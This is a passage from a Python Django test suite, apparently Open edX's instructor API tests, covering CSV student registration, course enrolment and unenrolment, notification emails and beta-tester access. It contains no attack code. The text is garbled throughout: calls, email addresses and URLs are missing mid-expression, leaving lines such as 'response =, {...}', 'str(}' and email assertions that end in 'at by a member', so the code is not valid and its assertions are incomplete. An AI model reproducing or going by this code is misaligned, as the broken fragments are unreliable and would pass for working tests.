b",test_student_4,tester4,USA\n" \ b",test_student_2,tester2,USA" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) != 0 assert data['row_errors'][0]['response'] == 'Username {user} already exists.'.format(user='test_student_1') assert data['row_errors'][1]['response'] == 'Invalid email {email}.'.format(email='') assert User.objects.filter(username='test_student_1', email='').exists() assert User.objects.filter(username='test_student_2', email='').exists() assert not User.objects.filter(email='').exists() assert not User.objects.filter(email='').exists() manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 2 @patch('lms.djangoapps.instructor.views.api', 'generate_random_string', Mock(side_effect=['first', 'first', 'second'])) def test_generate_unique_password_no_reuse(self): """ generate_unique_password should generate a unique password string that hasn't been generated before. """ generated_password = ['first'] password = generate_unique_password(generated_password, 12) assert password != 'first' @patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': False}) def test_allow_automated_signups_flag_not_set(self): csv_content = b",test_student_1,tester1,USA" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 403 manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 0 @patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': True}) def test_audit_enrollment_mode(self): """ Test that enrollment mode for audit courses (paid courses) is 'audit'. """ # Login Audit Course instructor self.client.login(username=self.audit_course_instructor.username, password='test') csv_content = b",test_student_wl,Test Student,USA" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) == 0 assert len(data['warnings']) == 0 assert len(data['general_errors']) == 0 manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED # Verify enrollment modes to be 'audit' for enrollment in manual_enrollments: assert enrollment.enrollment.mode == CourseMode.AUDIT @patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': True}) def test_honor_enrollment_mode(self): """ Test that enrollment mode for unpaid honor courses is 'honor'. """ # Remove white label course price self.white_label_course_mode.min_price = 0 self.white_label_course_mode.suggested_prices = '' # Login Audit Course instructor self.client.login(username=self.white_label_course_instructor.username, password='test') csv_content = b",test_student_wl,Test Student,USA" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) == 0 assert len(data['warnings']) == 0 assert len(data['general_errors']) == 0 manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED # Verify enrollment modes to be 'honor' for enrollment in manual_enrollments: assert enrollment.enrollment.mode == CourseMode.HONOR @ddt.ddt class TestInstructorAPIEnrollment(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test enrollment modification endpoint. This test does NOT exhaustively test state changes, that is the job of test_enrollment. This tests the response and action switch. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() # Email URL values cls.site_name = configuration_helpers.get_value( 'SITE_NAME', settings.SITE_NAME ) cls.about_path = f'/courses/{}/about' cls.course_path = f'/courses/{}/' def setUp(self): super().setUp() self.request = RequestFactory().request() self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') self.enrolled_student = UserFactory(username='EnrolledStudent', first_name='Enrolled', last_name='Student') CourseEnrollment.enroll( self.enrolled_student, ) self.notenrolled_student = UserFactory(username='NotEnrolledStudent', first_name='NotEnrolled', last_name='Student') # Create invited, but not registered, user cea = CourseEnrollmentAllowed(email='', self.allowed_email = '' self.notregistered_email = '' assert User.objects.filter(email=self.notregistered_email).count() == 0 # uncomment to enable enable printing of large diffs # from failed assertions in the event of a test failure. # (comment because pylint C0103(invalid-name)) # self.maxDiff = None def test_missing_params(self): """ Test missing all query parameters. """ url = reverse('students_update_enrollment', kwargs={'course_id': str(}) response = assert response.status_code == 400 def test_bad_action(self): """ Test with an invalid action. """ action = 'robot-not-an-action' url = reverse('students_update_enrollment', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': action}) assert response.status_code == 400 def test_invalid_email(self): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) response =, {'identifiers': 'percivaloctavius@', 'action': 'enroll', 'email_students': False}) # lint-amnesty, pylint: disable=line-too-long assert response.status_code == 200 # test the response data expected = { "action": "enroll", 'auto_enroll': False, "results": [ { "identifier": 'percivaloctavius@', "invalidIdentifier": True, } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_invalid_username(self): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) response =, {'identifiers': 'percivaloctavius', 'action': 'enroll', 'email_students': False}) assert response.status_code == 200 # test the response data expected = { "action": "enroll", 'auto_enroll': False, "results": [ { "identifier": 'percivaloctavius', "invalidIdentifier": True, } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_enroll_with_username(self): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) response =, {'identifiers': self.notenrolled_student.username, 'action': 'enroll', 'email_students': False}) assert response.status_code == 200 # test the response data expected = { "action": "enroll", 'auto_enroll': False, "results": [ { "identifier": self.notenrolled_student.username, "before": { "enrollment": False, "auto_enroll": False, "user": True, "allowed": False, }, "after": { "enrollment": True, "auto_enroll": False, "user": True, "allowed": False, } } ] } manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_enroll_without_email(self): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': 'enroll', 'email_students': False}) print("type( {}".format(type( assert response.status_code == 200 # test that the user is now enrolled user = User.objects.get( assert CourseEnrollment.is_enrolled(user, # test the response data expected = { "action": "enroll", "auto_enroll": False, "results": [ { "identifier":, "before": { "enrollment": False, "auto_enroll": False, "user": True, "allowed": False, }, "after": { "enrollment": True, "auto_enroll": False, "user": True, "allowed": False, } } ] } manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 0'http', 'https') def test_enroll_with_email(self, protocol): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers':, 'action': 'enroll', 'email_students': True} environ = {'wsgi.url_scheme': protocol} response =, params, **environ) print("type( {}".format(type( assert response.status_code == 200 # test that the user is now enrolled user = User.objects.get( assert CourseEnrollment.is_enrolled(user, # test the response data expected = { "action": "enroll", "auto_enroll": False, "results": [ { "identifier":, "before": { "enrollment": False, "auto_enroll": False, "user": True, "allowed": False, }, "after": { "enrollment": True, "auto_enroll": False, "user": True, "allowed": False, } } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been enrolled in {self.course.display_name}' text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] assert text_body.startswith('Dear NotEnrolled Student\n\n') for body in [text_body, html_body]: assert f'You have been enrolled in {self.course.display_name} at by a member of the course staff.'\ in body assert 'This course will now appear on your dashboard.' in body assert f'{protocol}://{self.site_name}{self.course_path}' in body assert 'To start accessing course materials, please visit' in text_body assert 'This email was automatically sent from to NotEnrolled Student\n\n' in text_body'http', 'https') def test_enroll_with_email_not_registered(self, protocol): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True} environ = {'wsgi.url_scheme': protocol} response =, params, **environ) manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL assert response.status_code == 200 # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}' text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] register_url = f'{protocol}://{self.site_name}/register' assert text_body.startswith('Dear student,') assert 'To finish your registration, please visit {register_url}'.format( register_url=register_url, ) in text_body assert 'Please finish your registration and fill out' in html_body assert register_url in html_body for body in [text_body, html_body]: assert 'You have been invited to join {course} at by a member of the course staff.'.format( course=self.course.display_name ) in body assert ('fill out the registration form making sure to use ' ' in the Email field') in body assert 'Once you have registered and activated your account,' in body assert '{proto}://{site}{about_path}'.format( proto=protocol, site=self.site_name, about_path=self.about_path ) in body assert 'This email was automatically sent from to' in body'http', 'https') @patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True}) def test_enroll_email_not_registered_mktgsite(self, protocol): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True} environ = {'wsgi.url_scheme': protocol} response =, params, **environ) manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL assert response.status_code == 200 text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] assert text_body.startswith('Dear student,') assert 'To finish your registration, please visit' in text_body assert 'Please finish your registration and fill' in html_body for body in [text_body, html_body]: assert 'You have been invited to join {display_name} at by a member of the course staff.'.format( display_name=self.course.display_name ) in body assert '{proto}://{site}/register'.format( proto=protocol, site=self.site_name ) in body assert ('fill out the registration form making sure to use ' ' in the Email field') in body assert 'You can then enroll in {display_name}.'.format( display_name=self.course.display_name ) in body assert 'This email was automatically sent from to' in body'http', 'https') def test_enroll_with_email_not_registered_autoenroll(self, protocol): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True, 'auto_enroll': True} environ = {'wsgi.url_scheme': protocol} response =, params, **environ) print("type(self.notregistered_email): {}".format(type(self.notregistered_email))) assert response.status_code == 200 # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}' manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] register_url = '{proto}://{site}/register'.format( proto=protocol, site=self.site_name, ) assert text_body.startswith('Dear student,') assert 'To finish your registration, please visit {register_url}'.format( register_url=register_url, ) in text_body assert 'Please finish your registration and fill out the registration' in html_body assert 'Finish Your Registration' in html_body assert register_url in html_body for body in [text_body, html_body]: assert 'You have been invited to join {display_name} at by a member of the course staff.'.format( display_name=self.course.display_name ) in body assert (' and fill ' 'out the registration form making sure to use ' 'in the Email field') in body assert ('Once you have registered and activated your account, ' 'you will see {display_name} listed on your dashboard.').format( display_name=self.course.display_name ) in body assert 'This email was automatically sent from to' in body def test_unenroll_without_email(self): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': 'unenroll', 'email_students': False}) print("type( {}".format(type( assert response.status_code == 200 # test that the user is now unenrolled user = User.objects.get( assert not CourseEnrollment.is_enrolled(user, # test the response data expected = { "action": "unenroll", "auto_enroll": False, "results": [ { "identifier":, "before": { "enrollment": True, "auto_enroll": False, "user": True, "allowed": False, }, "after": { "enrollment": False, "auto_enroll": False, "user": True, "allowed": False, } } ] } manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == ENROLLED_TO_UNENROLLED res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 0 def test_unenroll_with_email(self): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': 'unenroll', 'email_students': True}) print("type( {}".format(type( assert response.status_code == 200 # test that the user is now unenrolled user = User.objects.get( assert not CourseEnrollment.is_enrolled(user, # test the response data expected = { "action": "unenroll", "auto_enroll": False, "results": [ { "identifier":, "before": { "enrollment": True, "auto_enroll": False, "user": True, "allowed": False, }, "after": { "enrollment": False, "auto_enroll": False, "user": True, "allowed": False, } } ] } manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == ENROLLED_TO_UNENROLLED res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been unenrolled from {self.course.display_name}' text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] assert text_body.startswith('Dear Enrolled Student') for body in [text_body, html_body]: assert 'You have been unenrolled from {display_name} at by a member of the course staff.'.format( display_name=self.course.display_name, ) in body assert 'This course will no longer appear on your dashboard.' in body assert 'Your other courses have not been affected.' in body assert 'This email was automatically sent from to Enrolled Student' in body def test_unenroll_with_email_allowed_student(self): url = reverse('students_update_enrollment', kwargs={'course_id': str(}) response =, {'identifiers': self.allowed_email, 'action': 'unenroll', 'email_students': True}) print(u"type(self.allowed_email): {}".format(type(self.allowed_email))) assert response.status_code == 200 # test the response data expected = { "action": "unenroll", "auto_enroll": False, "results": [ { "identifier": self.allowed_email, "before": { "enrollment": False, "auto_enroll": False, "user": False, "allowed": True, }, "after": { "enrollment": False, "auto_enroll": False, "user": False, "allowed": False, } } ] } manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == ALLOWEDTOENROLL_TO_UNENROLLED res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been unenrolled from {self.course.display_name}' text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] assert text_body.startswith('Dear Student,') for body in [text_body, html_body]: assert 'You have been unenrolled from the course {display_name} by a member of the course staff.'.format( display_name=self.course.display_name, ) in body assert 'Please disregard the invitation previously sent.' in body assert 'This email was automatically sent from to' in body'http', 'https') @patch('lms.djangoapps.instructor.enrollment.uses_shib') def test_enroll_with_email_not_registered_with_shib(self, protocol, mock_uses_shib): mock_uses_shib.return_value = True url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True} environ = {'wsgi.url_scheme': protocol} response =, params, **environ) assert response.status_code == 200 # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}' text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] course_url = '{proto}://{site}{about_path}'.format( proto=protocol, site=self.site_name, about_path=self.about_path, ) assert text_body.startswith('Dear student,') assert 'To access this course visit {course_url} and register for this course.'.format( course_url=course_url, ) in text_body assert 'To access this course visit it and register:' in html_body assert course_url in html_body for body in [text_body, html_body]: assert 'You have been invited to join {display_name} at by a member of the course staff.'.format( display_name=self.course.display_name, ) in body assert 'This email was automatically sent from to' in body @patch('lms.djangoapps.instructor.enrollment.uses_shib') @patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True}) def test_enroll_email_not_registered_shib_mktgsite(self, mock_uses_shib): # Try with marketing site enabled and shib on mock_uses_shib.return_value = True url = reverse('students_update_enrollment', kwargs={'course_id': str(}) # Try with marketing site enabled with patch.dict('django.conf.settings.FEATURES', {'ENABLE_MKTG_SITE': True}): response =, {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True}) assert response.status_code == 200 text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] assert text_body.startswith('Dear student,') for body in [text_body, html_body]: assert 'You have been invited to join {display_name} at by a member of the course staff.'.format( display_name=self.course.display_name, ) in body assert 'This email was automatically sent from to' in body'http', 'https') @patch('lms.djangoapps.instructor.enrollment.uses_shib') def test_enroll_with_email_not_registered_with_shib_autoenroll(self, protocol, mock_uses_shib): mock_uses_shib.return_value = True url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': True, 'auto_enroll': True} environ = {'wsgi.url_scheme': protocol} response =, params, **environ) print("type(self.notregistered_email): {}".format(type(self.notregistered_email))) assert response.status_code == 200 # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been invited to register for {self.course.display_name}' text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] course_url = '{proto}://{site}{course_path}'.format( proto=protocol, site=self.site_name, course_path=self.course_path, ) assert text_body.startswith('Dear student,') assert course_url in html_body assert f'To access this course visit {course_url} and login.' in text_body assert 'To access this course click on the button below and login:' in html_body for body in [text_body, html_body]: assert 'You have been invited to join {display_name} at by a member of the course staff.'.format( display_name=self.course.display_name, ) in body assert 'This email was automatically sent from to' in body def test_enroll_already_enrolled_student(self): """ Ensure that already enrolled "verified" students cannot be downgraded to "honor" """ course_enrollment = CourseEnrollment.objects.get( user=self.enrolled_student, ) # make this enrollment "verified" course_enrollment.mode = 'verified' assert course_enrollment.mode == 'verified' # now re-enroll the student through the instructor dash self._change_student_enrollment(self.enrolled_student, self.course, 'enroll') # affirm that the student is still in "verified" mode course_enrollment = CourseEnrollment.objects.get( user=self.enrolled_student, ) manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == ENROLLED_TO_ENROLLED assert course_enrollment.mode == 'verified' def create_paid_course(self): """ create paid course mode. """ paid_course = CourseFactory.create() CourseModeFactory.create(, min_price=50, mode_slug=CourseMode.HONOR) CourseInstructorRole( return paid_course def test_unenrolled_allowed_to_enroll_user(self): """ test to unenroll allow to enroll user. """ paid_course = self.create_paid_course() url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': False, 'auto_enroll': False, 'reason': 'testing..', 'role': 'Learner'} response =, params) manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ALLOWEDTOENROLL assert response.status_code == 200 # now registered the user UserFactory(email=self.notregistered_email) url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': False, 'auto_enroll': False, 'reason': 'testing', 'role': 'Learner'} response =, params) manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 2 assert manual_enrollments[1].state_transition == ALLOWEDTOENROLL_TO_ENROLLED assert response.status_code == 200 # test the response data expected = { "action": "enroll", "auto_enroll": False, "results": [ { "identifier": self.notregistered_email, "before": { "enrollment": False, "auto_enroll": False, "user": True, "allowed": True, }, "after": { "enrollment": True, "auto_enroll": False, "user": True, "allowed": True, } } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_unenrolled_already_not_enrolled_user(self): """ test unenrolled user already not enrolled in a course. """ paid_course = self.create_paid_course() course_enrollment = CourseEnrollment.objects.filter( user__email=self.notregistered_email, ) assert course_enrollment.count() == 0 url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers': self.notregistered_email, 'action': 'unenroll', 'email_students': False, 'auto_enroll': False, 'reason': 'testing', 'role': 'Learner'} response =, params) assert response.status_code == 200 # test the response data expected = { "action": "unenroll", "auto_enroll": False, "results": [ { "identifier": self.notregistered_email, "before": { "enrollment": False, "auto_enroll": False, "user": False, "allowed": False, }, "after": { "enrollment": False, "auto_enroll": False, "user": False, "allowed": False, } } ] } manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_UNENROLLED res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected def test_unenroll_and_enroll_verified(self): """ Test that unenrolling and enrolling a student from a verified track results in that student being in the default track """ course_enrollment = CourseEnrollment.objects.get( user=self.enrolled_student, ) # upgrade enrollment course_enrollment.mode = 'verified' assert course_enrollment.mode == 'verified' self._change_student_enrollment(self.enrolled_student, self.course, 'unenroll') self._change_student_enrollment(self.enrolled_student, self.course, 'enroll') course_enrollment = CourseEnrollment.objects.get( user=self.enrolled_student, ) assert course_enrollment.mode == CourseMode.DEFAULT_MODE_SLUG def test_reason_is_persisted(self): """ test that reason field is persisted in the database """ paid_course = self.create_paid_course() url = reverse('students_update_enrollment', kwargs={'course_id': str(}) params = {'identifiers': self.notregistered_email, 'action': 'enroll', 'email_students': False, 'auto_enroll': False, 'reason': 'testing'} response =, params) manual_enrollment = ManualEnrollmentAudit.objects.first() assert manual_enrollment.reason == 'testing' assert response.status_code == 200 def _change_student_enrollment(self, user, course, action): """ Helper function that posts to 'students_update_enrollment' to change a student's enrollment """ url = reverse( 'students_update_enrollment', kwargs={'course_id': str(}, ) params = { 'identifiers':, 'action': action, 'email_students': True, 'reason': 'change user enrollment', 'role': 'Learner' } response =, params) assert response.status_code == 200 return response def test_get_enrollment_status(self): """Check that enrollment states are reported correctly.""" # enrolled, active url = reverse( 'get_student_enrollment_status', kwargs={'course_id': str(}, ) params = { 'unique_student_identifier': 'EnrolledStudent' } response =, params) assert response.status_code == 200 res_json = json.loads(response.content.decode('utf-8')) assert res_json['enrollment_status'] == 'Enrollment status for EnrolledStudent: active' # unenrolled, inactive CourseEnrollment.unenroll( self.enrolled_student, ) response =, params) assert response.status_code == 200 res_json = json.loads(response.content.decode('utf-8')) assert res_json['enrollment_status'] == 'Enrollment status for EnrolledStudent: inactive' # invited, not yet registered params = { 'unique_student_identifier': '' } response =, params) assert response.status_code == 200 res_json = json.loads(response.content.decode('utf-8')) assert res_json['enrollment_status'] == 'Enrollment status for pending' # never enrolled or invited params = { 'unique_student_identifier': '' } response =, params) assert response.status_code == 200 res_json = json.loads(response.content.decode('utf-8')) assert res_json['enrollment_status'] == 'Enrollment status for never enrolled' @ddt.ddt class TestInstructorAPIBulkBetaEnrollment(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test bulk beta modify access endpoint. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() # Email URL values cls.site_name = configuration_helpers.get_value( 'SITE_NAME', settings.SITE_NAME ) cls.about_path = f'/courses/{}/about' cls.course_path = f'/courses/{}/' def setUp(self): super().setUp() self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') self.beta_tester = BetaTesterFactory( CourseEnrollment.enroll( self.beta_tester, ) assert CourseBetaTesterRole( self.notenrolled_student = UserFactory(username='NotEnrolledStudent') self.notregistered_email = '' assert User.objects.filter(email=self.notregistered_email).count() == 0 self.request = RequestFactory().request() # uncomment to enable enable printing of large diffs # from failed assertions in the event of a test failure. # (comment because pylint C0103(invalid-name)) # self.maxDiff = None def test_beta_tester_must_not_earn_cert(self): """ Test to ensure that beta tester must not earn certificate in a course in which he/she is a beta-tester. """ with LogCapture() as capture: message = 'Cancelling course certificate generation for user [{}] against course [{}], ' \ 'user is a Beta Tester.' message = message.format(self.beta_tester.username, generate_user_certificates(self.beta_tester,, self.course) capture.check_present(('lms.djangoapps.certificates.generation_handler', 'INFO', message)) def test_missing_params(self): """ Test missing all query parameters. """ url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response = assert response.status_code == 400 def test_bad_action(self): """ Test with an invalid action. """ action = 'robot-not-an-action' url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': action}) assert response.status_code == 400 def add_notenrolled(self, response, identifier): """ Test Helper Method (not a test, called by other tests) Takes a client response from a call to bulk_beta_modify_access with 'email_students': False, and the student identifier (email or username) given as 'identifiers' in the request. Asserts the reponse returns cleanly, that the student was added as a beta tester, and the response properly contains their identifier, 'error': False, and 'userDoesNotExist': False. Additionally asserts no email was sent. """ assert response.status_code == 200 assert CourseBetaTesterRole( # test the response data expected = { "action": "add", "results": [ { "identifier": identifier, "error": False, "userDoesNotExist": False, "is_active": True } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 0 def test_add_notenrolled_email(self): url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': 'add', 'email_students': False}) # lint-amnesty, pylint: disable=line-too-long self.add_notenrolled(response, assert not CourseEnrollment.is_enrolled(self.notenrolled_student, def test_add_notenrolled_email_autoenroll(self): url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': 'add', 'email_students': False, 'auto_enroll': True}) # lint-amnesty, pylint: disable=line-too-long self.add_notenrolled(response, assert CourseEnrollment.is_enrolled(self.notenrolled_student, def test_add_notenrolled_username(self): url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response =, {'identifiers': self.notenrolled_student.username, 'action': 'add', 'email_students': False}) # lint-amnesty, pylint: disable=line-too-long self.add_notenrolled(response, self.notenrolled_student.username) assert not CourseEnrollment.is_enrolled(self.notenrolled_student, def test_add_notenrolled_username_autoenroll(self): url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response =, {'identifiers': self.notenrolled_student.username, 'action': 'add', 'email_students': False, 'auto_enroll': True}) # lint-amnesty, pylint: disable=line-too-long self.add_notenrolled(response, self.notenrolled_student.username) assert CourseEnrollment.is_enrolled(self.notenrolled_student,'http', 'https') def test_add_notenrolled_with_email(self, protocol): url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) params = {'identifiers':, 'action': 'add', 'email_students': True} environ = {'wsgi.url_scheme': protocol} response =, params, **environ) assert response.status_code == 200 assert CourseBetaTesterRole( # test the response data expected = { "action": "add", "results": [ { "identifier":, "error": False, "userDoesNotExist": False, "is_active": True } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been invited to a beta test for {self.course.display_name}' text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] student_name = assert text_body.startswith(f'Dear {student_name}') assert f'Visit {self.course.display_name}' in html_body for body in [text_body, html_body]: assert 'You have been invited to be a beta tester for {display_name} at'.format( display_name=self.course.display_name, ) in body assert 'by a member of the course staff.' in body assert 'enroll in this course and begin the beta test' in body assert '{proto}://{site}{about_path}'.format( proto=protocol, site=self.site_name, about_path=self.about_path, ) in body assert 'This email was automatically sent from to {student_email}'.format(, ) in body'http', 'https') def test_add_notenrolled_with_email_autoenroll(self, protocol): url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) params = {'identifiers':, 'action': 'add', 'email_students': True, 'auto_enroll': True} environ = {'wsgi.url_scheme': protocol} response =, params, **environ) assert response.status_code == 200 assert CourseBetaTesterRole( # test the response data expected = { "action": "add", "results": [ { "identifier":, "error": False, "userDoesNotExist": False, "is_active": True } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 1 assert mail.outbox[0].subject == f'You have been invited to a beta test for {self.course.display_name}' text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] student_name = assert text_body.startswith(f'Dear {student_name}') for body in [text_body, html_body]: assert 'You have been invited to be a beta tester for {display_name} at'.format( display_name=self.course.display_name, ) in body assert 'by a member of the course staff' in body assert 'To start accessing course materials, please visit' in body assert '{proto}://{site}{course_path}'.format( proto=protocol, site=self.site_name, course_path=self.course_path ) assert 'This email was automatically sent from to {student_email}'.format(, ) in body @patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True}) def test_add_notenrolled_email_mktgsite(self): # Try with marketing site enabled url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': 'add', 'email_students': True}) # lint-amnesty, pylint: disable=line-too-long assert response.status_code == 200 text_body = mail.outbox[0].body html_body = mail.outbox[0].alternatives[0][0] student_name = assert text_body.startswith(f'Dear {student_name}') for body in [text_body, html_body]: assert 'You have been invited to be a beta tester for {display_name} at'.format( display_name=self.course.display_name, ) in body assert 'by a member of the course staff.' in body assert 'Visit' in body assert 'enroll in this course and begin the beta test' in body assert 'This email was automatically sent from to {student_email}'.format(, ) in body def test_enroll_with_email_not_registered(self): # User doesn't exist url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response =, {'identifiers': self.notregistered_email, 'action': 'add', 'email_students': True, 'reason': 'testing'}) assert response.status_code == 200 # test the response data expected = { "action": "add", "results": [ { "identifier": self.notregistered_email, "error": True, "userDoesNotExist": True, "is_active": None } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 0 def test_remove_without_email(self): url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': 'remove', 'email_students': False, 'reason': 'testing'}) assert response.status_code == 200 # Works around a caching bug which supposedly can't happen in prod. The instance here is not == # the instance fetched from the email above which had its cache cleared if hasattr(self.beta_tester, '_roles'): del self.beta_tester._roles assert not CourseBetaTesterRole( # test the response data expected = { "action": "remove", "results": [ { "identifier":, "error": False, "userDoesNotExist": False, "is_active": True } ] } res_json = json.loads(response.content.decode('utf-8')) assert res_json == expected # Check the outbox assert len(mail.outbox) == 0 def test_remove_with_email(self): url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(}) response =, {'identifiers':, 'action': 'remove', 'email_students': True, 'reason': 'testing'}) assert response.status_code == 200 # Works around a caching bug which supposedly can't happen in prod. The instance here is not == # the instance fetched from the email above which had its cache cleared if hasattr(self.beta_tester, '_roles'): del self.beta_tester._roles assert not CourseBetaTesterRole( # test the response data expected = { "action": "remove", "results": [ { 